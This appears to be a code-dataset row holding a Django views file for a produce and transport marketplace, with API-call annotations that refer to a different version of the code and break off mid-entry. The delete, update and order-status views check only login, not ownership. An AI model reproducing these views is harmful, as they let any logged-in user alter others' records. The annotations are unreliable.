code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
from django.shortcuts import render,redirect,get_object_or_404
from .forms import *
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .models import *
from django.views.generic import DetailView,DeleteView
from django.urls import reverse_lazy
from test2.notification import send_message
from django.core.paginator import Paginator
from real_price.models import *
from django.core.mail import send_mail
# Create your views here.
@login_required
def add_product(request):
    """Create a new product listing.

    GET: render the empty product form (producers only; any other role is
    redirected to the homepage).
    POST: validate and save the submitted product, re-rendering the form
    with a success flash on success or with validation errors on failure.

    Fixes: removed the unreachable trailing ``return render(...)`` (every
    branch above it already returns) and the dead first ``context`` store.
    """
    md = ProductCatagory.objects.all()
    catagory = AddCatagory()
    if request.method == 'POST':
        form = AddProducts(request.POST, request.FILES)
        if form.is_valid():
            form.save()
            context = {'form': form, 'cat': md, 'catagory': catagory}
            messages.success(request, 'You Have Sucessfully Added new Product ')
            return render(request, 'product_add.html', context)
        else:
            # Invalid submission: log diagnostics and re-render with errors.
            print(form.errors)
            context = {'form': form, 'cat': md, 'catagory': catagory}
            print(request.user.username)
            print(request.user.id)
            return render(request, 'product_add.html', context)
    else:
        form = AddProducts()
        context = {'form': form, 'cat': md, 'catagory': catagory}
        # Only producers may add products; everyone else goes home.
        if request.user.role == 'Producer':
            return render(request, 'product_add.html', context)
        return redirect('homepage')
@login_required
def delete_product(request, pk):
    """Delete the product with primary key *pk* and return to the dashboard.

    Uses ``get_object_or_404`` (already imported at the top of the file) so
    a missing product yields a 404 page instead of an unhandled
    ``DoesNotExist`` server error.
    """
    item = get_object_or_404(Products, pk=pk)
    item.delete()
    messages.success(request, 'You Have Sucessfully Deleted A Product ')
    return redirect('user_products')
@login_required
def update_product(request, pk):
    """Edit an existing product.

    POST: validate and save the changes; redirect to the owner's product
    list on success, otherwise re-render the edit form.
    GET: render the edit form pre-filled with the product's current data.

    Fixes: removed the unreachable ``print(form1.errors)`` after the
    ``if``/``else`` (both branches return) and the redundant second
    ``Products.objects.get(pk=pk)`` in the GET branch.
    """
    cat = ProductCatagory.objects.all()
    pro = Products.objects.get(pk=pk)
    if request.method == 'POST':
        form1 = AddProducts(request.POST, request.FILES or None, instance=pro)
        if form1.is_valid():
            form1.save()
            print('Product Updated')
            return redirect('user_products')
        else:
            print(form1.errors)
            # Re-bind a fresh form to the product so the page shows its
            # current stored values again (matches original behavior).
            form1 = AddProducts(instance=pro)
            context = {'form1': form1, 'product': pro, 'cat': cat, 'pk': pk}
            return render(request, 'product_update.html', context)
    else:
        form1 = AddProducts(instance=pro)
        context = {'form1': form1, 'product': pro, 'cat': cat, 'pk': pk}
        return render(request, 'product_update.html', context)
@login_required
def update_transport(request, pk):
    """Edit an existing transport offer.

    POST: validate and save; redirect to the dashboard on success,
    otherwise re-render the edit form.
    GET: render the edit form pre-filled with the transport's data.

    Fixes: removed the unreachable ``print(form1.errors)`` after the
    ``if``/``else`` (both branches return) and the redundant second
    ``Transports.objects.get(pk=pk)`` in the GET branch.
    """
    pro = Transports.objects.get(pk=pk)
    if request.method == 'POST':
        form1 = AddTransports(request.POST, request.FILES or None, instance=pro)
        if form1.is_valid():
            form1.save()
            print('Transport Updated')
            messages.success(request, 'Transport Updated Sucessfully !')
            return redirect('user_products')
        else:
            print(form1.errors)
            # Re-bind a fresh form so the page shows stored values again
            # (matches original behavior).
            form1 = AddTransports(instance=pro)
            context = {'form1': form1, 'product': pro, 'pk': pk}
            return render(request, 'transport_update.html', context)
    else:
        form1 = AddTransports(instance=pro)
        context = {'form1': form1, 'product': pro, 'pk': pk}
        return render(request, 'transport_update.html', context)
def contactus(request):
    """Contact page: display the message form and save submitted messages.

    Fix: on an invalid POST the original re-rendered a brand-new empty
    ``MessageSend()`` form, so the user's input and the validation errors
    were silently discarded; the bound form is now passed back instead.
    """
    if request.method == "POST":
        form = MessageSend(request.POST)
        if form.is_valid():
            form.save()
            print('saved')
            messages.success(request, 'Your Message Have Been Sucssusfuly Sent ')
            print(messages)
            return redirect('contactus')
        else:
            print('notsaved')
            print(form.errors)
            messages.error(request, 'Your Message Have Not Been Sent ')
            print(messages)
            # Keep the bound form so the template can show field errors.
            context = {'form': form}
            return render(request, 'contact.html', context)
    else:
        form = MessageSend()
        context = {'form': form}
        return render(request, 'contact.html', context)
@login_required
def delete_orders(request, pk):
    """Delete the product order with primary key *pk*.

    Uses ``get_object_or_404`` so a missing order yields a 404 instead of
    an unhandled ``DoesNotExist`` server error.
    """
    order = get_object_or_404(ProductOrders, pk=pk)
    order.delete()
    messages.success(request, 'Order Deleted Successfully ')
    return redirect('user_products')
@login_required
def delete_transports(request, pk):
    """Delete the transport offer with primary key *pk*.

    Uses ``get_object_or_404`` so a missing transport yields a 404 instead
    of an unhandled ``DoesNotExist`` server error.
    """
    order = get_object_or_404(Transports, pk=pk)
    order.delete()
    messages.success(request, 'Transport Deleted Successfully')
    return redirect('user_products')
@login_required
def user_products(request):
    """Role-specific dashboard of the current user's items and orders.

    Producers see their products plus incoming/outgoing orders;
    transport providers see their transports and transport orders;
    price tellers and buyers see their own orders. Unknown roles are
    redirected to the homepage.
    """
    # Orders placed BY the current user are shown for every role.
    my_orders = ProductOrders.objects.filter(ordered_by=request.user)
    my_order = my_orders.count()
    print(request.user.role)
    role = request.user.role
    if role == 'Producer':
        # NOTE: 'prouct_owner' is the (misspelled) model field name.
        orders = ProductOrders.objects.filter(prouct_owner=request.user)
        order = orders.count()
        print(orders)
        print(request.user.role)
        print(request.user.role)
        products = Products.objects.filter(user=request.user)
        context = {
            'form': products,
            'amount': products.count(),
            'my_orders': my_orders,
            'my_order': my_order,
            'orders': orders,
            'order': order,
        }
        return render(request, 'userproducts.html', context)
    elif role == 'Transport-Provider':
        t_orders = TransportOrders.objects.filter(transport_owner=request.user)
        transports = Transports.objects.filter(user=request.user)
        context = {
            'transport': transports,
            'amount': transports.count(),
            't_orders': t_orders,
            't_order': t_orders.count(),
            'my_orders': my_orders,
            'my_order': my_order,
        }
        return render(request, 'userproducts.html', context)
    elif role == 'Price_teller':
        orders = ProductOrders.objects.filter(ordered_by=request.user)
        price_teller = ProductPrice.objects.filter(user=request.user)
        context = {
            'orders': orders,
            'order': orders.count(),
            'price_teller': price_teller,
            'price_count': price_teller.count(),
        }
        return render(request, 'price_teller_orders.html', context)
    elif role == 'Buyer':
        orders = ProductOrders.objects.filter(ordered_by=request.user)
        context = {'orders': orders, 'order': orders.count()}
        return render(request, 'buyer_orders.html', context)
    else:
        return redirect('homepage')
@login_required
def add_catagory(request):
    """Save a POSTed new product category, then return to product creation.

    Fix: the original flashed the *failure* case with ``messages.success``;
    it now uses ``messages.error`` so the UI styles it as a failure.
    The flash text and all redirect targets are unchanged.
    """
    if request.method == 'POST':
        catagory = AddCatagory(request.POST)
        if catagory.is_valid():
            catagory.save()
            messages.success(request, 'New Catagory Added ! ')
        else:
            messages.error(request, 'Invalid Catagory ! ')
    # All paths (valid, invalid, non-POST) return to the create page.
    return redirect('create_product')
@login_required
def product_detail(request, pk):
    """Show one product with its comments, owner map coordinates, and a
    comment form; a POST submits a new comment for the product."""
    form1 = CommentRev()
    com = CustomUser.objects.all()
    item = Products.objects.get(pk=pk)
    print(pk)
    # Derive latitude/longitude from the owner's comma-separated address,
    # falling back to a default location when no address is stored.
    if item.user.Adress:
        pieces = item.user.Adress.split(',')
        la = pieces[0]
        lo = pieces[-2]
    else:
        la = '89.002'
        lo = '42.442'
    commentes = CommentReview.objects.filter(product_id=pk)
    print(commentes)
    # The queryset is lazy, so it reflects any comment saved below by the
    # time the template renders.  NB: 'com ' (trailing space) is the key
    # the template expects.
    page_ctx = {
        'item': item,
        'com ': com,
        'comment': commentes,
        'form': form1,
        'la': la,
        'lo': lo,
    }
    if request.method == "POST":
        form = CommentRev(request.POST)
        if form.is_valid():
            print('valid')
            form.save()
            print('saved')
            messages.success(request, 'You Have Sucessfully Commented ')
        else:
            messages.success(request, 'Unable To Comment! ')
    return render(request, 'product_detail_view.html', context=page_ctx)
@login_required
def change_status(request,pk):
    """Toggle acceptance of product order *pk* and notify by e-mail.

    If the order is currently accepted it is declined and the buyer is
    e-mailed; otherwise it is accepted and both buyer and product owner
    receive confirmation e-mails.  Always redirects to 'user_products'.
    """
    item = ProductOrders.objects.get(pk=pk)
    if item.accecpted:
        # Currently accepted -> decline it and notify the buyer.
        item.accecpted = False
        man = request.user.username
        body1 = f'\nDear Customer Sorry Your Product Orderd From {man} is Declined Try another Options \n'\
        f'Product_owener:{item.prouct_owner.username}\n' \
        f'orderd_by :{item.ordered_by.username}\n' \
        f'Ordered Date:{item.order_date}\n'\
        f'Ordere Id:{item.pk}\n'\
        f'Price:{item.ordered_item.price} birr {item.ordered_item.amount} \n'\
        f'Delivery Adress:{request.user.optional_adress}\n'\
        f'ordered_item :{item.ordered_item}\n\n' \
        f'FROM DRIMS TEAM. \nTank You For Using Our Service'
        # Only e-mail when the buyer has an address on file.
        if item.ordered_by.Email_Adress:
            email = item.ordered_by.Email_Adress
            send_mail("Hello From Drims Team",
            body1,
            'With Regards Drims Team',
            [email],
            fail_silently = False)
            print('owener email')
        item.save()
        messages.success(request, 'Request Declined')
        return redirect('user_products')
    else:
        # Not accepted yet -> accept it and notify both parties.
        item.accecpted = True
        phone = item.ordered_by.phone
        # NOTE: 'item. prouct_owner' (space after the dot) is valid Python
        # attribute access; the field name itself is misspelled in the model.
        owners_phone = item. prouct_owner.phone
        # body1 goes to the buyer (includes the owner's phone number).
        body1 = f'\nDear Customer You Have Sucsessfully Orderd A Product \n'\
        f'Your Request is Accepted \n'\
        f'Product_owener:{item.prouct_owner.username}\n' \
        f'orderd_by :{item.ordered_by.username}\n' \
        f'Ordered Date:{item.order_date}\n'\
        f'Ordere Id:{item.pk}\n'\
        f'Price:{item.ordered_item.price} birr {item.ordered_item.amount} \n'\
        f'Delivery Adress:{request.user.optional_adress}\n'\
        f'ordered_item :{item.ordered_item}\n\n' \
        f'Product_owners Phone Number :{owners_phone}\n\n' \
        f'FROM DRIMS TEAM. \nTank You For Using Our Service'
        man = item.ordered_by.username
        # body2 goes to the product owner (includes the buyer's phone number).
        body2 = f'\nDear Customer You Have Sucsessfully Accepted Order from {man} \n'\
        f'Your Accepted Order Request \n'\
        f'Product_owener:{item.prouct_owner.username}\n' \
        f'orderd_by :{item.ordered_by.username}\n' \
        f'Ordered Date:{item.order_date}\n'\
        f'Ordere Id:{item.pk}\n'\
        f'Price:{item.ordered_item.price} birr {item.ordered_item.amount} \n'\
        f'Delivery Adress:{request.user.optional_adress}\n'\
        f'ordered_item :{item.ordered_item}\n\n' \
        f'Orderers Phone Number :{phone}\n\n' \
        f'FROM DRIMS TEAM. \nTank You For Using Our Service'
        if item.ordered_by.Email_Adress:
            email = item.ordered_by.Email_Adress
            print('have orderer email')
            send_mail("Hello From Drims Team",
            body1,
            'With Regards Drims Team',
            [email],
            fail_silently = False)
        if item. prouct_owner.Email_Adress:
            email = item. prouct_owner.Email_Adress
            send_mail("Hello From Drims Team",
            body2,
            'With Regards Drims Team',
            [email],
            fail_silently = False)
            print('owener email')
        print(body1)
        print(body2)
        item.save()
        messages.success(request, 'You Have Sucessfully Accepted A Product Request You will Get Message Notification Soon ')
        return redirect('user_products')
    # Unreachable: both branches above return.
    return redirect('user_products')
@login_required
def change_status_transport(request,pk):
    """Toggle transport order *pk* and e-mail the person who ordered it.

    An accepted order is declined (with a notification e-mail); a pending
    one is accepted (with a confirmation e-mail that includes the transport
    owner's phone number).  Always redirects to 'user_products'.
    """
    item = TransportOrders.objects.get(pk=pk)
    if item.status:
        # Currently accepted -> decline and notify the orderer.
        item.status = False
        man =request.user.username
        body1 = f'\nDear {item.ordered_by} Sorry Your Request To Get Transport acess From {man} is Declined \n'\
        f'Transport owener:{item.transport_owner.username}\n' \
        f'orderd_by :{item.ordered_by.username}\n' \
        f'Ordered Date:{item.order_date}\n'\
        f'Ordere Id:{item.pk}\n'\
        f'Try another Options\n'\
        f'FROM DRIMS TEAM. \nTank You For Using Our Service'
        # Only e-mail when the orderer has an address on file.
        if item.ordered_by.Email_Adress:
            email = item.ordered_by.Email_Adress
            send_mail("Hello From Drims Team",
            body1,
            'With Regards Drims Team',
            [email],
            fail_silently = False)
            print('owener email')
        item.save()
        messages.success(request, 'Request Declined')
        return redirect('user_products')
    else:
        # Pending -> accept and send the confirmation e-mail.
        item.status = True
        owners_phone = item.transport_owner.phone
        man = request.user.username
        body1 = f'\nDear Your Request To Get Transport access From {man} is Accepted \n'\
        f'Your Request is Accepted \n'\
        f'Transport owener:{item.transport_owner.username}\n' \
        f'orderd_by :{item.ordered_by.username}\n' \
        f'Ordered Date:{item.order_date}\n'\
        f'Ordere Id:{item.pk}\n'\
        f'Transport_owners Phone Number :{owners_phone}\n\n' \
        f'FROM DRIMS TEAM. \nTank You For Using Our Service'
        if item.ordered_by.Email_Adress:
            email = item.ordered_by.Email_Adress
            # NOTE(review): unlike the decline branch, fail_silently is not
            # set here, so send failures raise by default — confirm intended.
            send_mail("Hello From Drims Team",
            body1,
            'With Regards Drims Team',
            [email],
            )
            print('owener email')
        send_to = item.ordered_by.phone  # captured but not used afterwards
        print(body1)
        item.save()
        messages.success(request, 'You Have Sucessfully Accepted A Transport Access Request ')
    return redirect('user_products')
@login_required
def order_product(request, pk):
    """Place an order for product *pk* on behalf of the current user.

    Creates a ProductOrders row with the product owner's address as the
    order source and the buyer's addresses as the destination, flashes a
    confirmation, and returns to the product detail page.

    Fixes: the original fetched the same product three separate times
    (``Products.objects.get(pk=pk)``) and built an e-mail body plus a
    ``phone`` local that were never used or sent; both removed.
    """
    pro = Products.objects.get(pk=pk)
    # Reuse the already-fetched product for every field of the order.
    ProductOrders.objects.create(
        ordered_by=request.user,
        order_source_adress=pro.user.Adress,
        ordered_item=pro,
        prouct_owner=pro.user,
        order_destination=request.user.Adress,
        orderer_optional_adress=request.user.optional_adress,
    )
    messages.success(request, 'You Have Sucessfully Sent Order Request For Product Owner\n You will Get Message Notification Soon Wen Request Approved !\n Tank You ! ')
    return redirect('product_detail', pk=pk)
@login_required
def search_transport(request):
    """Search transport offers by one of several fields.

    Reads ``query`` and ``filter_by`` from the query string, filters
    Transports with a case-insensitive containment match on the chosen
    field, and renders a paginated result page (4 per page).

    Fixes: ``request.GET['query']`` raised KeyError when the parameter was
    missing (now defaults to ''), and an unrecognized ``filter_by`` fell
    off the end of the function returning ``None`` (a server error); it
    now renders an empty result page.  The four copy-pasted branches are
    collapsed into one lookup table; as before, only the 'price' filter
    skips the "Your Search Result" flash message.
    """
    query = request.GET.get('query', '')
    filter_by = request.GET.get('filter_by', '')
    # Supported filters -> ORM lookup expressions.
    lookups = {
        'description': 'description__icontains',
        'specific_adress': 'specific_adress__icontains',
        'transport_name': 'transport_name__icontains',
        'price': 'price__icontains',
    }
    lookup = lookups.get(filter_by)
    if lookup is None:
        # Unknown filter: show an empty result set instead of crashing.
        product = Transports.objects.none()
    else:
        product = Transports.objects.filter(**{lookup: query})
        if filter_by != 'price':
            # Preserved quirk: the original never flashed for 'price'.
            messages.success(request, 'Your Search Result Here .. ')
    paginator = Paginator(product, 4)
    page_obj = paginator.get_page(request.GET.get('page'))
    return render(request, 'transport_search.html', context={'page_obj': page_obj})
@login_required
def wantedproductlist(request):
    """Render a paginated list (4 per page) of all wanted-product posts."""
    wanted = WantedProducts.objects.all()
    pages = Paginator(wanted, 4)
    print(pages)
    current_page = pages.get_page(request.GET.get('page'))
    return render(request, 'wanted_products_list.html', context={'page_obj': current_page})
@login_required
def wanted_product_detail(request,pk):
    """Show a wanted-product post; POST reports it as "found" by this user.

    NOTE(review): the notification body is only printed to stdout — nothing
    is actually e-mailed or texted despite the success flash; confirm
    whether a send_mail/send_message call is missing here.
    """
    item = WantedProducts.objects.get(pk=pk)
    if request.method == 'POST':
        phone = item.user.phone  # requester's phone; not used below
        man =request.user.username
        body = f'\nDear Customer Your Product Have Been Found By {man} \n'\
        f'request id :{item.pk}\n' \
        f'founded By :{request.user}\n' \
        f'request Date:{item.post_date}\n'\
        f'Specific Adress:{item.specific_adress}\n'\
        f'requested_item :{item.product_name}\n\n' \
        f'Founder Phone Number :{request.user.phone}\n\n' \
        f'FROM DRIMS TEAM. \nTank You For Using Our Service'
        messages.success(request, 'Your Request is Sent We Will Get To You Later ! Tankyou')
        print(body)
        return redirect ('wanted_product_detail' ,pk=pk)
    else:
        context ={'item':item}
        return render(request,'wanted_list.html',context)
@login_required
def add_wanted_product(request):
    """Post a product to the wanted list.

    GET: render an empty form.  POST: validate and save, then re-render
    the same form page with either a success flash or validation errors.
    """
    if request.method == 'POST':
        form = AddWantedProducts(request.POST, request.FILES)
        if form.is_valid():
            form.save()
            messages.success(request, 'You Have Sucessfully Added Product To Wanted List ')
        else:
            # Log diagnostics; the bound form (with errors) is re-rendered.
            print(form.errors)
            print(request.user.username)
            print(request.user.id)
    else:
        form = AddWantedProducts()
    return render(request, 'wanted_product.html', context={'form': form})
@login_required
def transport_add(request):
    """Add a transport offer.

    GET: render the empty transport form.  POST: save when valid; either
    way redirect back to this page so the flash message is displayed.

    Fix: the invalid-form case was flashed with ``messages.success``; it
    now uses ``messages.error`` so the UI styles it as a failure.  The
    flash text and redirect targets are unchanged.
    """
    if request.method == 'POST':
        form = AddTransports(request.POST, request.FILES)
        if form.is_valid():
            form.save()
            messages.success(request, 'You Have Sucessfully Added Transport Options')
        else:
            messages.error(request, 'You Please Provide Valid Information !!!')
        return redirect('transport_add')
    else:
        form = AddTransports()
        context = {'form': form}
        return render(request, 'add_transports.html', context)
@login_required
def display_transports(request):
    """Render a paginated listing (4 per page) of every transport offer."""
    transports = Transports.objects.all()
    pages = Paginator(transports, 4)
    print(pages)
    current_page = pages.get_page(request.GET.get('page'))
    return render(request, 'transport_list.html', context={'page_obj': current_page})
@login_required
def transport_product_detail(request, pk):
    """Transport detail page; a POST flashes an access-request confirmation
    and redirects back to the same page."""
    transport = Transports.objects.get(pk=pk)
    if request.method == 'POST':
        print("Request Sent")
        messages.success(request, 'Your Request is Sent We Will Get To You Later ! Tankyou')
        return redirect('transport_product_detail', pk=pk)
    return render(request, 'transport_details.html', context={'item': transport})
@login_required
def order_Transport(request, pk):
    """Request access to transport *pk* for the current user.

    Creates a TransportOrders row with the transport owner's address as the
    source, flashes a confirmation, and returns to the detail page.

    Fix: the original queried the same Transports row three times; the
    first fetch is now reused for every field.
    """
    pro = Transports.objects.get(pk=pk)
    TransportOrders.objects.create(
        ordered_by=request.user,
        order_source_adress=pro.user.Adress,
        transport_owner=pro.user,
        orderer_optional_adress=request.user.optional_adress,
    )
    messages.success(request, 'You Have Sucessfully Requested A Transport Acsess We Will Get \nTo You When Request Is Accpted Tankyou ! ')
    return redirect('transport_product_detail', pk=pk)
| [
"django.shortcuts.render",
"django.core.mail.send_mail",
"django.contrib.messages.error",
"django.shortcuts.redirect",
"django.contrib.messages.success",
"django.core.paginator.Paginator"
] | [((1667, 1735), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Have Sucessfully Deleted A Product """'], {}), "(request, 'You Have Sucessfully Deleted A Product ')\n", (1683, 1735), False, 'from django.contrib import messages\n'), ((1747, 1772), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (1755, 1772), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((4452, 4508), 'django.contrib.messages.success', 'messages.success', (['request', '"""Order Deleted Successfully """'], {}), "(request, 'Order Deleted Successfully ')\n", (4468, 4508), False, 'from django.contrib import messages\n'), ((4520, 4545), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (4528, 4545), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((4663, 4722), 'django.contrib.messages.success', 'messages.success', (['request', '"""Transport Deleted Successfully"""'], {}), "(request, 'Transport Deleted Successfully')\n", (4679, 4722), False, 'from django.contrib import messages\n'), ((4734, 4759), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (4742, 4759), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((8290, 8431), 'django.shortcuts.render', 'render', (['request', '"""product_detail_view.html"""'], {'context': "{'item': item, 'com ': com, 'comment': commentes, 'form': form1, 'la': la,\n 'lo': lo}"}), "(request, 'product_detail_view.html', context={'item': item, 'com ':\n com, 'comment': commentes, 'form': form1, 'la': la, 'lo': lo})\n", (8296, 8431), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((11939, 11964), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (11947, 11964), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((15127, 
15303), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Have Sucessfully Sent Order Request For Product Owner\n You will Get Message Notification Soon Wen Request Approved !\n Tank You ! """'], {}), '(request,\n """You Have Sucessfully Sent Order Request For Product Owner\n You will Get Message Notification Soon Wen Request Approved !\n Tank You ! """\n )\n', (15143, 15303), False, 'from django.contrib import messages\n'), ((15305, 15338), 'django.shortcuts.redirect', 'redirect', (['"""product_detail"""'], {'pk': 'pk'}), "('product_detail', pk=pk)\n", (15313, 15338), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((17156, 17172), 'django.core.paginator.Paginator', 'Paginator', (['ob', '(4)'], {}), '(ob, 4)\n', (17165, 17172), False, 'from django.core.paginator import Paginator\n'), ((17326, 17402), 'django.shortcuts.render', 'render', (['request', '"""wanted_products_list.html"""'], {'context': "{'page_obj': page_obj}"}), "(request, 'wanted_products_list.html', context={'page_obj': page_obj})\n", (17332, 17402), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((19805, 19821), 'django.core.paginator.Paginator', 'Paginator', (['ob', '(4)'], {}), '(ob, 4)\n', (19814, 19821), False, 'from django.core.paginator import Paginator\n'), ((19948, 20018), 'django.shortcuts.render', 'render', (['request', '"""transport_list.html"""'], {'context': "{'page_obj': page_obj}"}), "(request, 'transport_list.html', context={'page_obj': page_obj})\n", (19954, 20018), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((20816, 20962), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Have Sucessfully Requested A Transport Acsess We Will Get \nTo You When Request Is Accpted Tankyou ! """'], {}), '(request,\n """You Have Sucessfully Requested A Transport Acsess We Will Get \nTo You When Request Is Accpted Tankyou ! 
"""\n )\n', (20832, 20962), False, 'from django.contrib import messages\n'), ((20963, 21006), 'django.shortcuts.redirect', 'redirect', (['"""transport_product_detail"""'], {'pk': 'pk'}), "('transport_product_detail', pk=pk)\n", (20971, 21006), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((1513, 1557), 'django.shortcuts.render', 'render', (['request', '"""product_add.html"""', 'context'], {}), "(request, 'product_add.html', context)\n", (1519, 1557), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((2608, 2655), 'django.shortcuts.render', 'render', (['request', '"""product_update.html"""', 'context'], {}), "(request, 'product_update.html', context)\n", (2614, 2655), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((3518, 3567), 'django.shortcuts.render', 'render', (['request', '"""transport_update.html"""', 'context'], {}), "(request, 'transport_update.html', context)\n", (3524, 3567), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((4296, 4336), 'django.shortcuts.render', 'render', (['request', '"""contact.html"""', 'context'], {}), "(request, 'contact.html', context)\n", (4302, 4336), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((5480, 5525), 'django.shortcuts.render', 'render', (['request', '"""userproducts.html"""', 'context'], {}), "(request, 'userproducts.html', context)\n", (5486, 5525), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((7240, 7266), 'django.shortcuts.redirect', 'redirect', (['"""create_product"""'], {}), "('create_product')\n", (7248, 7266), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((9502, 9547), 'django.contrib.messages.success', 'messages.success', (['request', '"""Request Declined"""'], {}), "(request, 'Request Declined')\n", (9518, 9547), False, 'from django.contrib import messages\n'), ((9564, 9589), 
'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (9572, 9589), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((11764, 11889), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Have Sucessfully Accepted A Product Request You will Get Message Notification Soon """'], {}), "(request,\n 'You Have Sucessfully Accepted A Product Request You will Get Message Notification Soon '\n )\n", (11780, 11889), False, 'from django.contrib import messages\n'), ((11897, 11922), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (11905, 11922), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((12913, 12958), 'django.contrib.messages.success', 'messages.success', (['request', '"""Request Declined"""'], {}), "(request, 'Request Declined')\n", (12929, 12958), False, 'from django.contrib import messages\n'), ((12974, 12999), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (12982, 12999), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((13974, 14064), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Have Sucessfully Accepted A Transport Access Request """'], {}), "(request,\n 'You Have Sucessfully Accepted A Transport Access Request ')\n", (13990, 14064), False, 'from django.contrib import messages\n'), ((14077, 14102), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (14085, 14102), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((15594, 15615), 'django.core.paginator.Paginator', 'Paginator', (['product', '(4)'], {}), '(product, 4)\n', (15603, 15615), False, 'from django.core.paginator import Paginator\n'), ((15720, 15776), 'django.contrib.messages.success', 'messages.success', (['request', '"""Your Search Result Here .. 
"""'], {}), "(request, 'Your Search Result Here .. ')\n", (15736, 15776), False, 'from django.contrib import messages\n'), ((15793, 15865), 'django.shortcuts.render', 'render', (['request', '"""transport_search.html"""'], {'context': "{'page_obj': page_obj}"}), "(request, 'transport_search.html', context={'page_obj': page_obj})\n", (15799, 15865), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((16003, 16024), 'django.core.paginator.Paginator', 'Paginator', (['product', '(4)'], {}), '(product, 4)\n', (16012, 16024), False, 'from django.core.paginator import Paginator\n'), ((16129, 16185), 'django.contrib.messages.success', 'messages.success', (['request', '"""Your Search Result Here .. """'], {}), "(request, 'Your Search Result Here .. ')\n", (16145, 16185), False, 'from django.contrib import messages\n'), ((16202, 16274), 'django.shortcuts.render', 'render', (['request', '"""transport_search.html"""'], {'context': "{'page_obj': page_obj}"}), "(request, 'transport_search.html', context={'page_obj': page_obj})\n", (16208, 16274), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((16430, 16451), 'django.core.paginator.Paginator', 'Paginator', (['product', '(4)'], {}), '(product, 4)\n', (16439, 16451), False, 'from django.core.paginator import Paginator\n'), ((16556, 16612), 'django.contrib.messages.success', 'messages.success', (['request', '"""Your Search Result Here .. """'], {}), "(request, 'Your Search Result Here .. 
')\n", (16572, 16612), False, 'from django.contrib import messages\n'), ((16629, 16701), 'django.shortcuts.render', 'render', (['request', '"""transport_search.html"""'], {'context': "{'page_obj': page_obj}"}), "(request, 'transport_search.html', context={'page_obj': page_obj})\n", (16635, 16701), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((16819, 16840), 'django.core.paginator.Paginator', 'Paginator', (['product', '(4)'], {}), '(product, 4)\n', (16828, 16840), False, 'from django.core.paginator import Paginator\n'), ((16953, 17025), 'django.shortcuts.render', 'render', (['request', '"""transport_search.html"""'], {'context': "{'page_obj': page_obj}"}), "(request, 'transport_search.html', context={'page_obj': page_obj})\n", (16959, 17025), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((18056, 18144), 'django.contrib.messages.success', 'messages.success', (['request', '"""Your Request is Sent We Will Get To You Later ! Tankyou"""'], {}), "(request,\n 'Your Request is Sent We Will Get To You Later ! 
Tankyou')\n", (18072, 18144), False, 'from django.contrib import messages\n'), ((18176, 18216), 'django.shortcuts.redirect', 'redirect', (['"""wanted_product_detail"""'], {'pk': 'pk'}), "('wanted_product_detail', pk=pk)\n", (18184, 18216), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((18271, 18315), 'django.shortcuts.render', 'render', (['request', '"""wanted_list.html"""', 'context'], {}), "(request, 'wanted_list.html', context)\n", (18277, 18315), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((19065, 19112), 'django.shortcuts.render', 'render', (['request', '"""wanted_product.html"""', 'context'], {}), "(request, 'wanted_product.html', context)\n", (19071, 19112), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((19659, 19706), 'django.shortcuts.render', 'render', (['request', '"""add_transports.html"""', 'context'], {}), "(request, 'add_transports.html', context)\n", (19665, 19706), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((20187, 20275), 'django.contrib.messages.success', 'messages.success', (['request', '"""Your Request is Sent We Will Get To You Later ! Tankyou"""'], {}), "(request,\n 'Your Request is Sent We Will Get To You Later ! 
